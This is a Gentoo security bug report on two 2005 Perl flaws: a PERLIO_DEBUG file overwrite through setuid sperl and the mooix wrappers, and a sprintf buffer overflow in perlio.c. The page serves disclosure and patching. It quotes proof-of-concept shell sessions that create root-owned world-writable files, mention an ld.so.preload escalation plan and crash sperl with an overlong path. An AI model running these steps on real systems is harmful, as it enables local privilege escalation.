Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 80235 - dev-lang/perl CAN-2005-015{5,6}
Summary: dev-lang/perl CAN-2005-015{5,6}
Status: RESOLVED DUPLICATE of bug 80460
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High normal (vote)
Assignee: Gentoo Security
URL:
Whiteboard: /CLASSIFIED date?
Keywords:
Depends on:
Blocks:
 
Reported: 2005-01-31 10:52 UTC by Sune Kloppenborg Jeppesen (RETIRED)
Modified: 2008-04-23 08:12 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---

Attachments
perl-5.8.6-bug33990.patch (perl-5.8.6-bug33990.patch,742 bytes, patch)
2005-01-31 10:53 UTC, Sune Kloppenborg Jeppesen (RETIRED) 		no flags Details | Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-31 10:52:31 UTC 
Two perl issues:

PERLIO_DEBUG
If set to the name of a file or device then certain operations of PerlIO
sub-system will be logged to that file (opened as append). Typical uses
are UNIX:

./perlio.c:    
void
PerlIO_debug(const char *fmt, ...)
{
...
    if (!dbg) {
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
        else
            dbg = -1;
    }


If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op.

else you can do the following either via sperl or vial sperl: 

sperl:
kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x  1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw-  1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

setuid wrapper:
kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper
/usr/sbin/mooregister /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2872 2003-11-20 15:28/usr/sbin/mooix-pty-helperc
-rwsr-xr-x  1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister

These are all setuid programs that invoke perl scripts.

/usr/share/mooix/mooix-pty-helper.pl
/usr/share/mooix/moopasswd.pl
/usr/share/mooix/mooregister.pl

kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper
need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22,
<CONFIG> line 98.
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2
-rw-rw-rw-  1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2

kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
/usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0
/usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0

kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2

hrmmm...
kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun time.

Second issue:

While looking at the source code to figure out what the details of my PERLIO_DEBUG file overwrite bug
I also found a buffer overflow... 

in perlio.c:

   if (dbg > 0) {
        dTHX;
#ifdef USE_ITHREADS
        /* Use fixed buffer as sv_catpvf etc. needs SVs */
        char buffer[1024];
        char *s;
        STRLEN len;
        s = CopFILE(PL_curcop);
        if (!s)
            s = "(none)";
        sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop));

Set PERLIO_DEBUG to anything

make a perl script calling sperl and run it with the full path (after placing it in a long ass directory)

#!/usr/bin/sperl5.8.4
print a;


kfinisterre@jdam:/tmp$ /tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.pl
Segmentation fault



 stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file or directory)
** eip[40175563] eax[ffffffda] ecx[00008441] edx[000001b6] ebx[080677ad] esp[bfffd294] ebp[bfffd2a8] esi[00008441] edi[40177d00]
 open("/tmp/lala", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 3
** eip[4021898a] eax[00000000] ecx[08054e04] edx[bfffcd9c] ebx[402e95e0] esp[bfffcbc8] ebp[bfffcbe0] esi[41414141] edi[bfffcd9c]
 --- SIGSEGV (Segmentation fault) @ 0 (0) ---
upeek: ptrace(PTRACE_PEEKUSER,2970,48,0): No such process
Comment 1 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-01-31 10:53:49 UTC 
Created attachment 50060 [details, diff]
perl-5.8.6-bug33990.patch

Mandrake patch
Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-02-01 01:37:59 UTC 
CAN-2005-0155 for the privilege escalation in debug mode
CAN-2005-0156 for the buffer overflow
Comment 3 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-02-02 07:01:45 UTC 
This is public now on #bug 80460.
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-02-02 10:13:25 UTC 

*** This bug has been marked as a duplicate of 80460 ***